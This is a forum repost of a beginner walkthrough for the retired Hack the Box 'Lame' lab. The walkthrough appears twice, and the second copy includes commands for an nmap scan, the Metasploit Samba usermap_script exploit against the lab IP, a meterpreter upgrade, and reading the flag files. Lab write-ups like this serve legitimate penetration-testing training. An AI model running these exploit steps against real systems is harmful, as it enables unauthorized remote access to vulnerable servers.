jesusbarrios
Software Productivity Booster
Divine
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
Hello friends!! Today we are going to solve another CTF challenge āLameā which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have a collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we canāt submit write up of any Active lab, therefore, we have chosen retried Lame lab.
Level: Beginners
Task: find user.txt and root.txt file in the victimās machine.
Letās begin the Game!!
Since these labs are online available therefore they have static IP and IP of Lame is 10.10.10.3 so letās begin with nmap port enumeration.
From given below image, you can observe that we found so many open ports such as 21 for ftp, 22 for ssh, 139 and 445 for samba service and also got hit OS platform can be Unix or Linux.
From nmap result we saw samba service smbd 3.x is running in victimās machine therefore next I search for any exploit related to this service in Google.
Gratefully Google gave me hint in their 2nd link of exploit DB.
Then I run the msfconsole command in terminal and load Metasploit framework for using Samba 3.0.20 < 3.0.25rc3 ā āUsernameā map scriptā Command Execution module for exploiting target machine.
Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.
I had updated command shell into the meterpreter shell by executing the following command.
Inside path: /home/makis I found the user.txt file and used cat āfilenameā command for reading this file.
Great!! We got our 1st flag successfully
Inside path: /root I found the root.txt file and used cat āfilenameā command for reading this file.
Great!! We got our 2nd flag successfully
It will be a very stress-free challenge for that candidate who has knowledge little know vulnerability analysis.
Happy Hacking!!
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Level: Beginners
Task: find user.txt and root.txt file in the victimās machine.
Letās begin the Game!!
Since these labs are online available therefore they have static IP and IP of Lame is 10.10.10.3 so letās begin with nmap port enumeration.
Code:
nmap -sV 10.10.10.3From given below image, you can observe that we found so many open ports such as 21 for ftp, 22 for ssh, 139 and 445 for samba service and also got hit OS platform can be Unix or Linux.
From nmap result we saw samba service smbd 3.x is running in victimās machine therefore next I search for any exploit related to this service in Google.
Gratefully Google gave me hint in their 2nd link of exploit DB.
Then I run the msfconsole command in terminal and load Metasploit framework for using Samba 3.0.20 < 3.0.25rc3 ā āUsernameā map scriptā Command Execution module for exploiting target machine.
Code:
use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
msf exploit(multi/samba/usermap_script) > exploitTerrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.
I had updated command shell into the meterpreter shell by executing the following command.
Code:
sessions -u 1Inside path: /home/makis I found the user.txt file and used cat āfilenameā command for reading this file.
Code:
cd /home
ls
cd makis
ls
cat user.txtGreat!! We got our 1st flag successfully
Inside path: /root I found the root.txt file and used cat āfilenameā command for reading this file.
Code:
cd /root
ls
cat root.txtGreat!! We got our 2nd flag successfully
It will be a very stress-free challenge for that candidate who has knowledge little know vulnerability analysis.
Happy Hacking!!
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here